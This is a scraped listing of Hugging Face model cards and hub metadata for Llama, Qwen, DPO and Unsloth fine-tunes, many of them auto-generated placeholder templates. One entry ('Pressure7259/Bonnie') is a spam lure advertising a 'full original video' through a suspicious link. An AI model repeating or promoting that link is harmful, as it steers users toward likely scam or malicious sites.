model_name: barc0/Llama-3.1-ARC-Potpourri-Induction-8B tags: - generated_from_trainer - alignment-handbook - trl - sft licence: license --- # Model Card for barc0/Llama-3.1-ARC-Potpourri-Induction-8B This model is a fine-tuned version of [barc0/Llama-3.1-ARC-Potpourri-Induction-8B](https://huggingface.co/barc0/Llama-3.1-ARC-Potpourri-Induction-8B) on the [['suehyunpark/induction_arc_inputs_train_bc_trajectories_max1-per-task_tool_token']](https://huggingface.co/datasets/['suehyunpark/induction_arc_inputs_train_bc_trajectories_max1-per-task_tool_token']) dataset. It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/suehyun/arc-improve/runs/vk5fb3oz) This model was trained with SFT. ### Framework versions - TRL: 0.12.1 - Transformers: 4.46.2 - Pytorch: 2.5.1 - Datasets: 3.1.0 - Tokenizers: 0.20.3 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_ACSEmployment_2_cfda_ep4_22
MinaMila
2025-06-11T09:56:43Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:56:38Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_Adult_ep6_22
MinaMila
2025-06-11T09:56:29Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:56:17Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
aplux/Llama-2-7B-Chat
aplux
2025-06-11T09:56:24Z
0
0
null
[ "AIoT", "QNN", "LLM", "text-generation", "arxiv:2307.09288", "base_model:meta-llama/Llama-2-7b-chat-hf", "base_model:finetune:meta-llama/Llama-2-7b-chat-hf", "license:llama2", "region:us" ]
text-generation
2025-06-11T09:45:21Z
--- license: llama2 pipeline_tag: text-generation tags: - AIoT - QNN - LLM base_model: - meta-llama/Llama-2-7b-chat-hf --- ![](https://aiot.aidlux.com/_next/image?url=%2Fapi%2Fv1%2Ffiles%2Fmodel%2Fcover%2F20250107142618_Llama-2-Model-Details.png&w=640&q=75) ## Llama-2-7B-Chat Llama 2 is a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. ## Model Details *Note: Use of this model is governed by the Meta license. In order to download the model weights and tokenizer, please visit the [website](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) and accept our License before requesting access here.* Meta developed and publicly released the Llama 2 family of large language models (LLMs), a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. Our fine-tuned LLMs, called Llama-2-Chat, are optimized for dialogue use cases. Llama-2-Chat models outperform open-source chat models on most benchmarks we tested, and in our human evaluations for helpfulness and safety, are on par with some popular closed-source models like ChatGPT and PaLM. **Model Developers** Meta **Variations** Llama 2 comes in a range of parameter sizes — 7B, 13B, and 70B — as well as pretrained and fine-tuned variations. **Input** Models input text only. **Output** Models generate text only. **Model Architecture** Llama 2 is an auto-regressive language model that uses an optimized transformer architecture. The tuned versions use supervised fine-tuning (SFT) and reinforcement learning with human feedback (RLHF) to align to human preferences for helpfulness and safety. ||Training Data|Params|Content Length|GQA|Tokens|LR| |---|---|---|---|---|---|---| |Llama 2|*A new mix of publicly available online data*|7B|4k|&#10007;|2.0T|3.0 x 10<sup>-4</sup>| |Llama 2|*A new mix of publicly available online data*|13B|4k|&#10007;|2.0T|3.0 x 10<sup>-4</sup>| |Llama 2|*A new mix of publicly available online data*|70B|4k|&#10004;|2.0T|1.5 x 10<sup>-4</sup>| *Llama 2 family of models.* Token counts refer to pretraining data only. All models are trained with a global batch-size of 4M tokens. Bigger models - 70B -- use Grouped-Query Attention (GQA) for improved inference scalability. **Model Dates** Llama 2 was trained between January 2023 and July 2023. **Status** This is a static model trained on an offline dataset. Future versions of the tuned models will be released as we improve model safety with community feedback. **License** A custom commercial license is available at: [https://ai.meta.com/resources/models-and-libraries/llama-downloads/](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) **Research Paper** ["Llama-2: Open Foundation and Fine-tuned Chat Models"](arxiv.org/abs/2307.09288) ## Source Model Evaluation > Note: This table showed source model instead of quantized model evaluation. Source Model Evaluation refer to [Llama-2-7B-Chat Evaluation Result](https://huggingface.co/meta-llama/Llama-2-7b-chat#evaluation-results) |Model|Size|Code|Commonsense Reasoning|World Knowledge|Reading Comprehension|Math|MMLU|BBH|AGI Eval| |---|---|---|---|---|---|---|---|---|---| |Llama 1|7B|14.1|60.8|46.2|58.5|6.95|35.1|30.3|23.9| |Llama 1|13B|18.9|66.1|52.6|62.3|10.9|46.9|37.0|33.9| |Llama 1|33B|26.0|70.0|58.4|67.6|21.4|57.8|39.8|41.7| |Llama 1|65B|30.7|70.7|60.5|68.6|30.8|63.4|43.5|47.6| |Llama 2|7B|16.8|63.9|48.9|61.3|14.6|45.3|32.6|29.3| |Llama 2|13B|24.5|66.9|55.4|65.8|28.7|54.8|39.4|39.1| |Llama 2|70B|**37.5**|**71.9**|**63.6**|**69.4**|**35.2**|**68.9**|**51.2**|**54.2**| **Overall performance on grouped academic benchmarks.** *Code:* We report the average pass@1 scores of our models on HumanEval and MBPP. *Commonsense Reasoning:* We report the average of PIQA, SIQA, HellaSwag, WinoGrande, ARC easy and challenge, OpenBookQA, and CommonsenseQA. We report 7-shot results for CommonSenseQA and 0-shot results for all other benchmarks. *World Knowledge:* We evaluate the 5-shot performance on NaturalQuestions and TriviaQA and report the average. *Reading Comprehension:* For reading comprehension, we report the 0-shot average on SQuAD, QuAC, and BoolQ. *MATH:* We report the average of the GSM8K (8 shot) and MATH (4 shot) benchmarks at top 1. |||TruthfulQA|Toxigen| |---|---|---|---| |Llama 1|7B|27.42|23.00| |Llama 1|13B|41.74|23.08| |Llama 1|33B|44.19|22.57| |Llama 1|65B|48.71|21.77| |Llama 2|7B|33.29|**21.25**| |Llama 2|13B|41.86|26.10| |Llama 2|70B|**50.18**|24.60| **Evaluation of pretrained LLMs on automatic safety benchmarks.** For TruthfulQA, we present the percentage of generations that are both truthful and informative (the higher the better). For ToxiGen, we present the percentage of toxic generations (the smaller the better). |||TruthfulQA|Toxigen| |---|---|---|---| |Llama-2-Chat|7B|57.04|**0.00**| |Llama-2-Chat|13B|62.18|**0.00**| |Llama-2-Chat|70B|**64.14**|0.01| ## Performance Reference Please search model by model name in [Model Farm](https://aiot.aidlux.com/en/models) ## Inference & Model Conversion Please search model by model name in [Model Farm](https://aiot.aidlux.com/en/models) ## License - Source Model: [LLAMA2](https://github.com/meta-llama/llama/blob/main/LICENSE) - - Deployable Model: [LLAMA2](https://github.com/meta-llama/llama/blob/main/LICENSE)
aplux/Qwen2-0.5B-Instruct
aplux
2025-06-11T09:56:02Z
0
0
null
[ "AIoT", "QNN", "LLM", "text-generation", "base_model:Qwen/Qwen2-0.5B", "base_model:finetune:Qwen/Qwen2-0.5B", "license:other", "region:us" ]
text-generation
2025-06-11T09:49:35Z
--- license: other license_name: aplux-model-farm-license license_link: https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf base_model: - Qwen/Qwen2-0.5B pipeline_tag: text-generation tags: - AIoT - QNN - LLM --- ![](https://aiot.aidlux.com/_next/image?url=%2Fapi%2Fv1%2Ffiles%2Fmodel%2Fcover%2F20250108094752_Qwen2-Logo-Alibaba.jpeg&w=640&q=75) ## Qwen2-0.5B-Instruct Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. Compared with the state-of-the-art opensource language models, including the previous released Qwen1.5, Qwen2 has generally surpassed most opensource models and demonstrated competitiveness against proprietary models across a series of benchmarks targeting for language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc. For more details, please refer to Qwen [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/). ## Model Details Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, Qwen2 have an improved tokenizer adaptive to multiple natural languages and codes. ## Source Model Evaluation > Note: This table showed source model instead of quantized model evaluation. Source Model Evaluation refer to [Qwen2-0.5B-Instruct Evaluation Result](https://huggingface.co/Qwen/Qwen2-0.5B-Instruct#evaluation) | Datasets | Qwen1.5-0.5B-Chat | **Qwen2-0.5B-Instruct** | Qwen1.5-1.8B-Chat | **Qwen2-1.5B-Instruct** | | :--- | :---: | :---: | :---: | :---: | | MMLU | 35.0 | **37.9** | 43.7 | **52.4** | | HumanEval | 9.1 | **17.1** | 25.0 | **37.8** | | GSM8K | 11.3 | **40.1** | 35.3 | **61.6** | | C-Eval | 37.2 | **45.2** | 55.3 | **63.8** | | IFEval (Prompt Strict-Acc.) | 14.6 | **20.0** | 16.8 | **29.0** | ## Performance Reference Please search model by model name in [Model Farm](https://aiot.aidlux.com/en/models) ## Inference & Model Conversion Please search model by model name in [Model Farm](https://aiot.aidlux.com/en/models) ## License - Source Model: [APACHE-2.0](https://github.com/QwenLM/Qwen/blob/main/LICENSE) - Deployable Model: [APLUX-MODEL-FARM-LICENSE](https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf)
sayantan0013/rubi_no_reason_phase_3
sayantan0013
2025-06-11T09:55:46Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "generated_from_trainer", "trl", "dpo", "conversational", "arxiv:2305.18290", "base_model:sayantan0013/rubi_no_reason_phase_2", "base_model:finetune:sayantan0013/rubi_no_reason_phase_2", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-06-11T04:27:31Z
--- base_model: sayantan0013/rubi_no_reason_phase_2 library_name: transformers model_name: rubi_no_reason_phase_3 tags: - generated_from_trainer - trl - dpo licence: license --- # Model Card for rubi_no_reason_phase_3 This model is a fine-tuned version of [sayantan0013/rubi_no_reason_phase_2](https://huggingface.co/sayantan0013/rubi_no_reason_phase_2). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="sayantan0013/rubi_no_reason_phase_3", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/sayantan0013-epfl/huggingface/runs/p0qz2em6) This model was trained with DPO, a method introduced in [Direct Preference Optimization: Your Language Model is Secretly a Reward Model](https://huggingface.co/papers/2305.18290). ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite DPO as: ```bibtex @inproceedings{rafailov2023direct, title = {{Direct Preference Optimization: Your Language Model is Secretly a Reward Model}}, author = {Rafael Rafailov and Archit Sharma and Eric Mitchell and Christopher D. Manning and Stefano Ermon and Chelsea Finn}, year = 2023, booktitle = {Advances in Neural Information Processing Systems 36: Annual Conference on Neural Information Processing Systems 2023, NeurIPS 2023, New Orleans, LA, USA, December 10 - 16, 2023}, url = {http://papers.nips.cc/paper_files/paper/2023/hash/a85b405ed65c6477a4fe8302b5e06ce7-Abstract-Conference.html}, editor = {Alice Oh and Tristan Naumann and Amir Globerson and Kate Saenko and Moritz Hardt and Sergey Levine}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
aplux/Qwen2-1.5B-Instruct
aplux
2025-06-11T09:55:40Z
0
0
null
[ "AIoT", "QNN", "LLM", "text-generation", "base_model:Qwen/Qwen2-1.5B", "base_model:finetune:Qwen/Qwen2-1.5B", "license:other", "region:us" ]
text-generation
2025-06-11T09:52:55Z
--- license: other license_name: aplux-model-farm-license license_link: https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf pipeline_tag: text-generation tags: - AIoT - QNN - LLM base_model: - Qwen/Qwen2-1.5B --- ![](https://aiot.aidlux.com/_next/image?url=%2Fapi%2Fv1%2Ffiles%2Fmodel%2Fcover%2F20250108095432_Qwen2-Logo-Alibaba.jpeg&w=640&q=75) ## Qwen2-1.5B-Instruct Qwen2 is the new series of Qwen large language models. For Qwen2, we release a number of base language models and instruction-tuned language models ranging from 0.5 to 72 billion parameters, including a Mixture-of-Experts model. Compared with the state-of-the-art opensource language models, including the previous released Qwen1.5, Qwen2 has generally surpassed most opensource models and demonstrated competitiveness against proprietary models across a series of benchmarks targeting for language understanding, language generation, multilingual capability, coding, mathematics, reasoning, etc. For more details, please refer to Qwen [blog](https://qwenlm.github.io/blog/qwen2/), [GitHub](https://github.com/QwenLM/Qwen2), and [Documentation](https://qwen.readthedocs.io/en/latest/). ## Model Details Qwen2 is a language model series including decoder language models of different model sizes. For each size, we release the base language model and the aligned chat model. It is based on the Transformer architecture with SwiGLU activation, attention QKV bias, group query attention, etc. Additionally, Qwen2 have an improved tokenizer adaptive to multiple natural languages and codes. ## Source Model Evaluation > Note: This table showed source model instead of quantized model evaluation. Source Model Evaluation refer to [Qwen2-1.5B-Instruct Evaluation Result](https://huggingface.co/Qwen/Qwen2-1.5B-Instruct#evaluation) | Datasets | Qwen1.5-0.5B-Chat | **Qwen2-0.5B-Instruct** | Qwen1.5-1.8B-Chat | **Qwen2-1.5B-Instruct** | | :--- | :---: | :---: | :---: | :---: | | MMLU | 35.0 | **37.9** | 43.7 | **52.4** | | HumanEval | 9.1 | **17.1** | 25.0 | **37.8** | | GSM8K | 11.3 | **40.1** | 35.3 | **61.6** | | C-Eval | 37.2 | **45.2** | 55.3 | **63.8** | | IFEval (Prompt Strict-Acc.) | 14.6 | **20.0** | 16.8 | **29.0** | ## Performance Reference Please search model by model name in [Model Farm](https://aiot.aidlux.com/en/models) ## Inference & Model Conversion Please search model by model name in [Model Farm](https://aiot.aidlux.com/en/models) ## License - Source Model: [APACHE-2.0](https://github.com/QwenLM/Qwen/blob/main/LICENSE) - - Deployable Model: [APLUX-MODEL-FARM-LICENSE](https://aiot.aidlux.com/api/v1/files/license/model_farm_license_en.pdf)
quelmap/r1-qwen3-8b-awb-4bnb
quelmap
2025-06-11T09:53:57Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "text-generation-inference", "unsloth", "conversational", "en", "base_model:unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit", "base_model:quantized:unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "4-bit", "bitsandbytes", "region:us" ]
text-generation
2025-06-11T09:49:19Z
--- base_model: unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen3 license: apache-2.0 language: - en --- # Uploaded finetuned model - **Developed by:** quelmap - **License:** apache-2.0 - **Finetuned from model :** unsloth/DeepSeek-R1-0528-Qwen3-8B-unsloth-bnb-4bit This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
CDIALing/english-checkpoint-vit
CDIALing
2025-06-11T09:53:47Z
0
0
transformers
[ "transformers", "safetensors", "vits", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:53:11Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
bravery08/influencer_sup_ft
bravery08
2025-06-11T09:53:35Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T06:31:57Z
--- base_model: unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** bravery08 - **License:** apache-2.0 - **Finetuned from model :** unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Satram/Llama_Instruct_Manuales2
Satram
2025-06-11T09:53:32Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T08:11:41Z
--- base_model: unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** Satram - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Pressure7259/Bonnie
Pressure7259
2025-06-11T09:51:52Z
0
0
null
[ "region:us" ]
null
2025-06-11T09:48:56Z
Watch 🟢 ➤ ➤ ➤ 🌐<a href="https://subwayreh.cfd/wesrd>Full Original Video Bonnie Blue Petting Zoo Video gaining sudden attention on Reddit)
Jorgvt/ppnet-baseline
Jorgvt
2025-06-11T09:51:35Z
4
0
null
[ "jax", "safetensors", "license:apache-2.0", "region:us" ]
null
2024-12-09T14:31:53Z
